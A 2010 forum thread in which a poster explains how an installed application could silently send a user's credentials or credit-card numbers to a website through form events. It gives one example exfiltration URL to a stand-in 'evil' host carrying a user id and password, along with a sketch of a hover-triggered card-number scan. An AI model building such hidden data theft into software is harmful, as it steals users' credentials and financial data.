Free Republic
Browse · Search 		News/Activism
Topics · Post Article

To: GOPJ

I have never done malicious stuff on a machine. I am insured for $5M so that I WON’T do stuff like that.

Whenever a piece of software is run on a system, we have events that happen. An event is stuff like mouse move, mouse hover, form close, form closing, form initialized, etc. About 100 events on a Windows form. Same is true of Linux or Macs because computing is computing. The old days didn’t work like that but let’s ignore it for now.

Any event can be wired to do anything. Hence, I could wire an event to pass your credentials to a website.

Take a simple example:

http://www.myevilwebsite.com?runProgram=getUserId;uid=****;pw=****

Whenever you open up a form and start typing, I can wire up the Ok and Cancel button events, call the above website, and pass in whatever I wanted to to the cgi parms at the end. Calling a website would happen without you ever seeing a web browser and without you ever knowing. You could use a network sniffer like Fiddler but you wouldn’t check that. End users understand the web as a browser when it isn’t.

I can also hide everything from you through encryption so that you couldn’t even discern it if you wanted to.

Basically, computers operate 100% on trust and numbers. If you trust my app, the system can belong to me. People can scream all day long about Windows, Linux, and Macs but you click ok and game on.

People worry about viruses but it is the click to installthat is an issue. I could have you hover over an app, detect the hover, automatically scan your machine for all numbers on it that meet a credit card regex, then send them to a website. That is a very simple exploit and would take me around 1 hour to code. And the worst part is that there is absolutely nothing you can do to stop it ONCE the malware is introduced.


116 posted on 04/07/2010 4:44:43 PM PDT by wireplay
[ Post Reply | Private Reply | To 112 | View Replies ]

To: wireplay

Interesting. I trust you - member since ‘98 - but fear kicked in - I couldn’t make myself click on the link... I’ll do it later. Thanks for the insights.


127 posted on 04/07/2010 6:21:47 PM PDT by GOPJ (http://hisz.rsoe.hu/alertmap/index2.php?area=dam&lang=eng)
[ Post Reply | Private Reply | To 116 | View Replies ]
To: wireplay
And the worst part is that there is absolutely nothing you can do to stop it ONCE the malware is introduced.

Well, except seeing the internet connection suddenly begin blinking madly for no apparent reason and unplugging the cable....

128 posted on 04/07/2010 6:23:07 PM PDT by HiTech RedNeck (I am in America but not of America (per bible: am in the world but not of it))
[ Post Reply | Private Reply | To 116 | View Replies ]

Free Republic
Browse · Search 		News/Activism
Topics · Post Article

FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson